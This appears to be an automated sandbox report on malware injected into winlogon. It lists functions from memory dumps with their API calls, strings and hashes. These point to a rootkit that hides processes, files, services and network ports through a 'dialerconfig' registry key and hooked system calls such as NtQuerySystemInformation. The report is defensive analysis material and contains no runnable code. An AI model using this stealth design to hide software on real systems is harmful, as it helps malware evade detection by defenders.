UnhandledExceptionFilter.KERNEL32 ref: 000001F6C88A7F94

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: db6530e822c96f4d7b1cc044adcff89caac3089801e185ecd677b203a675d724
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 62311972206A8296EB70DF70E8407FE63A4F785754F44442ADBCD57A99EF38C648C710

Function 000001F6C890B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F6C890B585
RtlLookupFunctionEntry.NTDLL ref: 000001F6C890B59D
RtlVirtualUnwind.NTDLL ref: 000001F6C890B5D8
IsDebuggerPresent.KERNEL32 ref: 000001F6C890B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F6C890B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001F6C890B626

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 462d93e9d4a0e680fdf53fa6f0790399abc521777f4edb82f0e93c3ca0212655
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 7C313A32214B8196EB60CF39E8403EE77A4F7897A5F500526EADD47BAADF38C5458B00

Function 000001F6C88AB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F6C88AB585
RtlLookupFunctionEntry.NTDLL ref: 000001F6C88AB59D
RtlVirtualUnwind.NTDLL ref: 000001F6C88AB5D8
IsDebuggerPresent.KERNEL32 ref: 000001F6C88AB611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F6C88AB61B
UnhandledExceptionFilter.KERNEL32 ref: 000001F6C88AB626

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 04e8964ada8482dde20aeaec504a128aca7da22888bc9670aff59ace52eb4a06
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 43312732215B8196EB60CF35E8403EE73A4F789B64F500126EADD43BA9EF38C5558B00

Function 000001F6C890FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F6C890FF67
WriteFile.KERNEL32 ref: 000001F6C891021E
WriteFile.KERNEL32 ref: 000001F6C8910270
GetLastError.KERNEL32 ref: 000001F6C8910372
GetLastError.KERNEL32 ref: 000001F6C89103D2

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 8135aa8c859eca88b472f6577030b008bd5a36516c187905332f9d78ebc0410d
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 2DE11332B08A818AE720CF79D4803ED7BB5F3457A9F144126EFCA57B9ADA39C516C700

Function 000001F6C88AFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F6C88AFF67
WriteFile.KERNEL32 ref: 000001F6C88B021E
WriteFile.KERNEL32 ref: 000001F6C88B0270
GetLastError.KERNEL32 ref: 000001F6C88B0372
GetLastError.KERNEL32 ref: 000001F6C88B03D2

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 19a5e2ae036198b21cea44d22e95435a03512543e2070a9386ced60e74043973
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: C9E1E132706A829AE721CF75D8842FD7BB1F3857A8F144126DECA57F99DA38C41AC700

Function 000001F6C8901650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C890165B
HeapAlloc.KERNEL32 ref: 000001F6C890166A

Part of subcall function 000001F6C8901274: GetProcessHeap.KERNEL32 ref: 000001F6C890127A
Part of subcall function 000001F6C8901274: HeapAlloc.KERNEL32 ref: 000001F6C8901289
Part of subcall function 000001F6C8901274: GetProcessHeap.KERNEL32 ref: 000001F6C89012A3
Part of subcall function 000001F6C8901274: HeapAlloc.KERNEL32 ref: 000001F6C89012B4

RegOpenKeyExW.ADVAPI32 ref: 000001F6C89016DA
RegOpenKeyExW.ADVAPI32 ref: 000001F6C8901707
RegCloseKey.ADVAPI32 ref: 000001F6C8901721
RegOpenKeyExW.ADVAPI32 ref: 000001F6C8901741
RegCloseKey.ADVAPI32 ref: 000001F6C890175C
RegOpenKeyExW.ADVAPI32 ref: 000001F6C890177C
RegCloseKey.ADVAPI32 ref: 000001F6C8901797
RegOpenKeyExW.ADVAPI32 ref: 000001F6C89017B7
RegCloseKey.ADVAPI32 ref: 000001F6C89017D2
RegOpenKeyExW.ADVAPI32 ref: 000001F6C89017F2
RegCloseKey.ADVAPI32 ref: 000001F6C890180D
RegOpenKeyExW.ADVAPI32 ref: 000001F6C890182D
RegCloseKey.ADVAPI32 ref: 000001F6C8901848
RegOpenKeyExW.ADVAPI32 ref: 000001F6C8901868
RegCloseKey.ADVAPI32 ref: 000001F6C8901883
RegOpenKeyExW.ADVAPI32 ref: 000001F6C89018A3
RegCloseKey.ADVAPI32 ref: 000001F6C89018BE
RegCloseKey.ADVAPI32 ref: 000001F6C89018C8

Part of subcall function 000001F6C89012C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C8901326
Part of subcall function 000001F6C89012C8: GetProcessHeap.KERNEL32 ref: 000001F6C8901334
Part of subcall function 000001F6C89012C8: HeapAlloc.KERNEL32 ref: 000001F6C8901345
Part of subcall function 000001F6C89012C8: RegEnumValueW.ADVAPI32 ref: 000001F6C89013A1
Part of subcall function 000001F6C89012C8: GetProcessHeap.KERNEL32 ref: 000001F6C89013E9
Part of subcall function 000001F6C89012C8: HeapAlloc.KERNEL32 ref: 000001F6C89013F7
Part of subcall function 000001F6C89012C8: GetProcessHeap.KERNEL32 ref: 000001F6C890141B
Part of subcall function 000001F6C89012C8: HeapFree.KERNEL32 ref: 000001F6C8901429
Part of subcall function 000001F6C89012C8: lstrlenW.KERNEL32 ref: 000001F6C8901432
Part of subcall function 000001F6C89012C8: GetProcessHeap.KERNEL32 ref: 000001F6C8901440
Part of subcall function 000001F6C89012C8: HeapAlloc.KERNEL32 ref: 000001F6C890144E

Strings

udp, xrefs: 000001F6C890189C
service_names, xrefs: 000001F6C89017EB
startup, xrefs: 000001F6C89016FD
paths, xrefs: 000001F6C89017B0
process_names, xrefs: 000001F6C8901775
tcp_remote, xrefs: 000001F6C8901861
tcp_local, xrefs: 000001F6C8901826
pid, xrefs: 000001F6C890173A
SOFTWARE\dialerconfig, xrefs: 000001F6C89016BA

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: ca77172fc4694397d0eee98b42b710f5442232310a5553bc0ed647c3b83bfaa7
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 73710B36310A5296EB20DF79E8506E967B8FB88BAAF005131DECE4772ADF38C545C300

Function 000001F6C89012C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C8901326
GetProcessHeap.KERNEL32 ref: 000001F6C8901334
HeapAlloc.KERNEL32 ref: 000001F6C8901345
RegEnumValueW.ADVAPI32 ref: 000001F6C89013A1

Part of subcall function 000001F6C8901554: StrCmpIW.SHLWAPI ref: 000001F6C8901585

GetProcessHeap.KERNEL32 ref: 000001F6C89013E9
HeapAlloc.KERNEL32 ref: 000001F6C89013F7
GetProcessHeap.KERNEL32 ref: 000001F6C890141B
HeapFree.KERNEL32 ref: 000001F6C8901429
lstrlenW.KERNEL32 ref: 000001F6C8901432
GetProcessHeap.KERNEL32 ref: 000001F6C8901440
HeapAlloc.KERNEL32 ref: 000001F6C890144E
StrCpyW.SHLWAPI ref: 000001F6C8901470
GetProcessHeap.KERNEL32 ref: 000001F6C8901485
HeapFree.KERNEL32 ref: 000001F6C8901493

Strings

d, xrefs: 000001F6C8901365

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 60450d9819197aa1e71601d9912f01fd07584f264283e72ac354523c06932170
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 53515A72218B8593EB24CF6AE5443AAB7B5F788BA1F448124DACA07B25DF3CC156C700

Function 000001F6C88A12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C88A1326
GetProcessHeap.KERNEL32 ref: 000001F6C88A1334
HeapAlloc.KERNEL32 ref: 000001F6C88A1345
RegEnumValueW.ADVAPI32 ref: 000001F6C88A13A1

Part of subcall function 000001F6C88A1554: StrCmpIW.SHLWAPI ref: 000001F6C88A1585

GetProcessHeap.KERNEL32 ref: 000001F6C88A13E9
HeapAlloc.KERNEL32 ref: 000001F6C88A13F7
GetProcessHeap.KERNEL32 ref: 000001F6C88A141B
HeapFree.KERNEL32 ref: 000001F6C88A1429
lstrlenW.KERNEL32 ref: 000001F6C88A1432
GetProcessHeap.KERNEL32 ref: 000001F6C88A1440
HeapAlloc.KERNEL32 ref: 000001F6C88A144E
StrCpyW.SHLWAPI ref: 000001F6C88A1470
GetProcessHeap.KERNEL32 ref: 000001F6C88A1485
HeapFree.KERNEL32 ref: 000001F6C88A1493

Strings

d, xrefs: 000001F6C88A1365

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: a6b8cf6b9d9920d88a13565a623ffc44b0789d6b107cdd6b88d0ef13e1be8d64
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 45515A76606B45D2EB24CF66E9443EAB7A5F788BA0F048124DBCA47F54DF38D156C700

Function 000001F6C8901EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001F6C8901EBF

Part of subcall function 000001F6C8902174: GetModuleHandleA.KERNEL32 ref: 000001F6C890218C
Part of subcall function 000001F6C8902174: GetProcAddress.KERNEL32 ref: 000001F6C890219D

Part of subcall function 000001F6C8905C10: GetCurrentThreadId.KERNEL32 ref: 000001F6C8905C4B

Strings

NtEnumerateValueKey, xrefs: 000001F6C8901F76
ntdll.dll, xrefs: 000001F6C8901ECD
advapi32.dll, xrefs: 000001F6C8901F97, 000001F6C8901FB8
NtQueryDirectoryFileEx, xrefs: 000001F6C8901F3C
EnumServicesStatusExW, xrefs: 000001F6C8901FB1, 000001F6C8901FD2
NtDeviceIoControlFile, xrefs: 000001F6C8901FF6
NtEnumerateKey, xrefs: 000001F6C8901F59
NtQuerySystemInformation, xrefs: 000001F6C8901EE5
EnumServiceGroupW, xrefs: 000001F6C8901F90
NtResumeThread, xrefs: 000001F6C8901F02
NtQueryDirectoryFile, xrefs: 000001F6C8901F1F
sechost.dll, xrefs: 000001F6C8901FD9

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 5018e3c16ee081900f48dfc0b44cb7c22ab6d3deb29489ff5733db2c5fabf063
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: AA31B375204A8BA0EA66EFBCEC516F46375B7483B7F80543795D912163DF38C689C381

Function 000001F6C88A1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001F6C88A1EBF

Part of subcall function 000001F6C88A2174: GetModuleHandleA.KERNEL32 ref: 000001F6C88A218C
Part of subcall function 000001F6C88A2174: GetProcAddress.KERNEL32 ref: 000001F6C88A219D

Part of subcall function 000001F6C88A5C10: GetCurrentThreadId.KERNEL32 ref: 000001F6C88A5C4B

Strings

advapi32.dll, xrefs: 000001F6C88A1F97, 000001F6C88A1FB8
NtResumeThread, xrefs: 000001F6C88A1F02
EnumServiceGroupW, xrefs: 000001F6C88A1F90
ntdll.dll, xrefs: 000001F6C88A1ECD
NtQueryDirectoryFileEx, xrefs: 000001F6C88A1F3C
EnumServicesStatusExW, xrefs: 000001F6C88A1FB1, 000001F6C88A1FD2
NtQueryDirectoryFile, xrefs: 000001F6C88A1F1F
sechost.dll, xrefs: 000001F6C88A1FD9
NtEnumerateValueKey, xrefs: 000001F6C88A1F76
NtEnumerateKey, xrefs: 000001F6C88A1F59
NtQuerySystemInformation, xrefs: 000001F6C88A1EE5
NtDeviceIoControlFile, xrefs: 000001F6C88A1FF6

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: acce079937b59a7d5ef512a0742d5e13e34530877829b40a35faa77f80c7a114
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 2331B274213A4BA0FA34EFB4EC517F42320A7843A4F805437D9D952DE59F3C9A4AC3A0

Function 000001F6C89023F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F6C8902405
GetCurrentProcessId.KERNEL32 ref: 000001F6C890240F

Part of subcall function 000001F6C89019AC: OpenProcess.KERNEL32 ref: 000001F6C89019CA
Part of subcall function 000001F6C89019AC: IsWow64Process.KERNEL32 ref: 000001F6C89019E0
Part of subcall function 000001F6C89019AC: CloseHandle.KERNEL32 ref: 000001F6C89019FB

CreateFileW.KERNEL32 ref: 000001F6C8902468
WriteFile.KERNEL32 ref: 000001F6C8902490
ReadFile.KERNEL32 ref: 000001F6C89024AF
CloseHandle.KERNEL32 ref: 000001F6C89024B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001F6C890243F
\\.\pipe\dialerchildproc64, xrefs: 000001F6C8902438

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 9cc23797241bd9c6455624054a86c55112d79788fc615ad117dbfb0d16f6876d
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 8D21303661864182E720CB79E4443AA77B5F389BB5F504225EADA07BA9CF3CC549CB01

Function 000001F6C88A23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F6C88A2405
GetCurrentProcessId.KERNEL32 ref: 000001F6C88A240F

Part of subcall function 000001F6C88A19AC: OpenProcess.KERNEL32 ref: 000001F6C88A19CA
Part of subcall function 000001F6C88A19AC: IsWow64Process.KERNEL32 ref: 000001F6C88A19E0
Part of subcall function 000001F6C88A19AC: CloseHandle.KERNEL32 ref: 000001F6C88A19FB

CreateFileW.KERNEL32 ref: 000001F6C88A2468
WriteFile.KERNEL32 ref: 000001F6C88A2490
ReadFile.KERNEL32 ref: 000001F6C88A24AF
CloseHandle.KERNEL32 ref: 000001F6C88A24B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001F6C88A2438
\\.\pipe\dialerchildproc32, xrefs: 000001F6C88A243F

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: bc9211c9e8d18c101fbcabb65d848da86a921b09b91581893ec400470b8fa780
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 5C211D36619A4292E720DB75E9443BA67A0F789BA4F504225EAD903FE8DF3CC549CB00

Function 000001F6C890D2CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000001F6C890D424

Strings

api-ms-, xrefs: 000001F6C890D391
ext-ms-, xrefs: 000001F6C890D3A4

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$ext-ms-
API String ID: 190572456-537541572
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: 41e8ccb8948c96b7d1ffde0f8dec85215f339e10aea494801db1006b48715fc8
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: 0541A17131568281FA75CF7A98047F96295B708BF3F0856359DDA8B7E6DB38D4059300

Function 000001F6C88AD2CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000001F6C88AD424

Strings

api-ms-, xrefs: 000001F6C88AD391
ext-ms-, xrefs: 000001F6C88AD3A4

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$ext-ms-
API String ID: 190572456-537541572
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: aff055bef8fee86c9947116e9ef96e44050fc13ebb726b510b007ece8b93aed7
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: 61418C76313A4291FA75DF66A8047FA6291BB44BF1F085535EED98BBD4EA3CD4068300

Function 000001F6C890104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C89010AB
RegEnumValueW.ADVAPI32 ref: 000001F6C890110E
GetProcessHeap.KERNEL32 ref: 000001F6C8901155
HeapAlloc.KERNEL32 ref: 000001F6C8901163
GetProcessHeap.KERNEL32 ref: 000001F6C8901187
HeapFree.KERNEL32 ref: 000001F6C8901195

Strings

d, xrefs: 000001F6C89010CE

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 2cf1d6a52a5fcf71608e85a74e4cc95ff2048ae57c1fa3a6e010ad1f8144cd66
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 3C415C73214B8197E764CF66E4447EAB7B1F389B96F408125DBCA07A55DF38D164CB00

Function 000001F6C88A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F6C88A10AB
RegEnumValueW.ADVAPI32 ref: 000001F6C88A110E
GetProcessHeap.KERNEL32 ref: 000001F6C88A1155
HeapAlloc.KERNEL32 ref: 000001F6C88A1163
GetProcessHeap.KERNEL32 ref: 000001F6C88A1187
HeapFree.KERNEL32 ref: 000001F6C88A1195

Strings

d, xrefs: 000001F6C88A10CE

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 1a0392e1c4c9c44b565f5797cb6e002aea4ad0cdb1cecb2e1023f6559b05a4c4
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: FD415C77215B8196E760CF62E4447EAB7A5F388B94F008125EBCA47A94DF38D565CB00

Function 000001F6C8909804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001F6C8909889
GetLastError.KERNEL32 ref: 000001F6C8909897
LoadLibraryExW.KERNEL32 ref: 000001F6C89098C1
FreeLibrary.KERNEL32 ref: 000001F6C8909907
GetProcAddress.KERNEL32 ref: 000001F6C8909913

Strings

api-ms-, xrefs: 000001F6C89098A9

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 257af69436dc62474af2289276336f1ea6a959ef5088c611663a86ed6f1156f1
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 0B31A231316A9291EE35DB6AA8007F963A4BB4CBB2F194535EDEE4B392DF38D4459300

Function 000001F6C88A9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001F6C88A9889
GetLastError.KERNEL32 ref: 000001F6C88A9897
LoadLibraryExW.KERNEL32 ref: 000001F6C88A98C1
FreeLibrary.KERNEL32 ref: 000001F6C88A9907
GetProcAddress.KERNEL32 ref: 000001F6C88A9913

Strings

api-ms-, xrefs: 000001F6C88A98A9

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 0f6d1fd8afa586edbf2a1f9b4329b7b84373774835819dc8e7b8660080197af6
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 9D316F31217A52A1EE31DB26AC407F962D4BB48BB4F594535EEFD47BD4EE38D4458300

Function 000001F6C8911B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F6C8911BCD
GetLastError.KERNEL32 ref: 000001F6C8911BD9
CloseHandle.KERNEL32 ref: 000001F6C8911BF1
CreateFileW.KERNEL32 ref: 000001F6C8911C1C
WriteConsoleW.KERNEL32 ref: 000001F6C8911C3B

Strings

CONOUT$, xrefs: 000001F6C8911BFD

